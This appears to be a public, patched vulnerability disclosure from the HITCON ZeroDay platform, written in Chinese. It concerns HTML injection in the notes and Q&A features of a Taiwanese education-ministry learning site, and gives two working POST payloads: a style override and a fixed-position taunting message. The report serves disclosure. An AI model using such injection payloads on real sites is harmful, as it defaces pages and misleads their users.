Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00635
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 教育部因才網筆記/提問/討論區功能 HTML Injection
- Introduction: 直接傳送 POST 請求繞過 HTML 過濾,使用 CSS position 顯示內容於任意位置。
處理狀態
目前狀態
公開
Last Update : 2024/07/20
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2024/06/04 11:10:32 : 新提交 (由 毛哥EM 更新此狀態)
- 2024/06/04 12:43:12 : 新提交 (由 毛哥EM 更新此狀態)
- 2024/06/06 15:01:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/12 20:05:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/12 20:05:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/12 16:36:28 : 已修補 (由 組織帳號 更新此狀態)
- 2024/07/20 03:00:09 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-00635
- 通報者:elvismao (毛哥EM)
- 風險:中
- 類型:其他 (Other)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://adl.edu.tw/modules_new.php?op=modload&name=srl&file=learning_note&crumbs=%E7%AD%86%E8%A8%98
https://adl.edu.tw/modules_new.php?op=modload&name=srl&file=learning_ask_student&crumbs=%E6%8F%90%E5%95%8F
以及所有影片網址如 https://adl.edu.tw/modules_new.php?op=modload&name=assignMission&file=ks_viewskill_new&ind=11-PBb-Va-1-14&mid=73333#video
https://adl.edu.tw/modules_new.php?op=modload&name=srl&file=learning_ask_student&crumbs=%E6%8F%90%E5%95%8F
以及所有影片網址如 https://adl.edu.tw/modules_new.php?op=modload&name=assignMission&file=ks_viewskill_new&ind=11-PBb-Va-1-14&mid=73333#video
敘述
攔截重新傳送留言/提問 POST,更改內容為 HTML 即可繞過過濾完成注入。
Post 網址: https://adl.edu.tw/turnpage.php
隨便幾個應用:
-
幫全班改個網頁主題:
router=XXXXXXXX&video_item_sn=QURNek15PUU×tamp2=0&content=<style>*{--main-light:red!important}</style> -
在網頁置中關不掉的內容:
router=XXXXXXXX&video_item_sn=QURNek15PUU×tamp2=0&content=<span style=" display: flex; justify-content: center; align-items: center; background-color: white; width: 300px; height: 200px; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); border: red 5px solid;font-size:2rem;">別讀了你期末就算考 100 也會被當</span>
順帶一提連這則訊息在畫面中都是置中的,不像因材網的首頁。如果不會的話上面的程式可以拿去。left: 31%; top: 40%; 換幾個螢幕就跑掉了。
修補建議
除了前端後端也要進行語法過濾。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。